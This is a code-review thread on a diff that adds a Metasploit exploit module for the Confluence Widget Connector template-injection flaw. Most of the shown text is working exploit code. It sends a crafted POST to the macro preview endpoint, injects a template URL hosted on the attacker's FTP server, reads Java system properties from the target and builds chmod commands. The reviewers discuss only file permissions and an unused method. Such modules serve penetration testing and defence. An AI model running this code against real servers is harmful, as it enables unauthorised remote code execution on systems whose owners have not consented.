modules/exploits/multi/http/confluence_widget_connector.rb

```diff
@@ -0,0 +1,494 @@
+      if res && res.body && res.body.include?('PwN3d')
+        checkcode = Exploit::CheckCode::Vulnerable
+      end
+    rescue Msf::Exploit::Failed => e
+      vprint_error(e.message)
+      checkcode = Exploit::CheckCode::Unknown
+    end
+    checkcode
+  end
+
+  # Injects Java code to the template.
+  #
+  # @param service_url [String] Address of template to injection.
+  # @return [void]
+  def inject_template(service_url)
+
+    uri  = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'headers' => {
+        'Accept' => '*/*',
+        'Origin' => full_uri(vhost_uri: true)    
+      },
+      'ctype'  => 'application/json; charset=UTF-8',
+      'data'   => { 
+                    'contentId' => '1',
+                    'macro' => {
+                      'name' => 'widget',
+                      'body' => '',
+                      'params' => {
+                        'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
+                        '_template' => service_url
+                      }
+
+                    }
+                  }.to_json
+    })
+
+    if !res
+      elog('Connection timed out in #inject_template')
+    elsif res && /widget-error/ === res.body
+      print_error('Failed to inject and execute code:')
+      vprint_line(res.body)
+    elsif res
+      vprint_status("Server response:")
+      vprint_line res.body
+    end
+
+    res
+  end
+
+  # Returns a system property for Java.
+  #
+  # @param prop [String] Name of the property to retrieve.
+  # @return [String]
+  def get_java_property(prop)
+    @prop = prop
+    res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
+    if res && res.body
+      return clear_response(res.body)
+    end
+    ''
+  end
+
+  # Returns the target platform.
+  #
+  # @return [String]
+  def get_target_platform()
+    return get_java_property('os.name')
+  end
+
+  # Checks if the target os/platform is compatible with the module target or not.
+  #
+  # @return [TrueClass] Compatible
+  # @return [FalseClass] Not compatible
+  def target_platform_compat?(target_platform)
+    target.platform.names.each do |n|
+      if /^java$/i === n || /#{n}/i === target_platform
+        return true
+      end
+    end
+
+    false
+  end
+
+  # Returns a temp path from the remote target.
+  #
+  # @return [String]
+  def get_tmp_path()
+    return get_java_property('java.io.tmpdir')
+  end
+
+  # Returns the Java home path used by Confluence.
+  #
+  # @return [String]
+  def get_java_home_path()
+    return get_java_property('java.home')
+  end
+
+  # Returns Java code that can be used to inject to the template in order to chmod a file.
+  #
+  # @param fname [String] File to chmod
+  # @return [void]
+  def get_chmod_code(fname)
+    @command = "chmod 777 #{fname}"
```

Comment:
These permissions seem excessive unless necessary. Why not `600` or `700`? This method doesn't look like it's being used either. Was this module copied from `modules/exploits/multi/http/jira_hipchat_template.rb`?

Reply:
Yep, this part copied from `modules/exploits/multi/http/jira_hipchat_template.rb`, but you'r right, it's excessive. I've changed permissions to `700`.

Reply:
Is the method being used anywhere? If not, you can remove it. If you plan to use it, carry on.

Reply:
Hmmm... It seems I forgot remove this part from previous variation of code. Removed.

Reply:
All good. Thanks!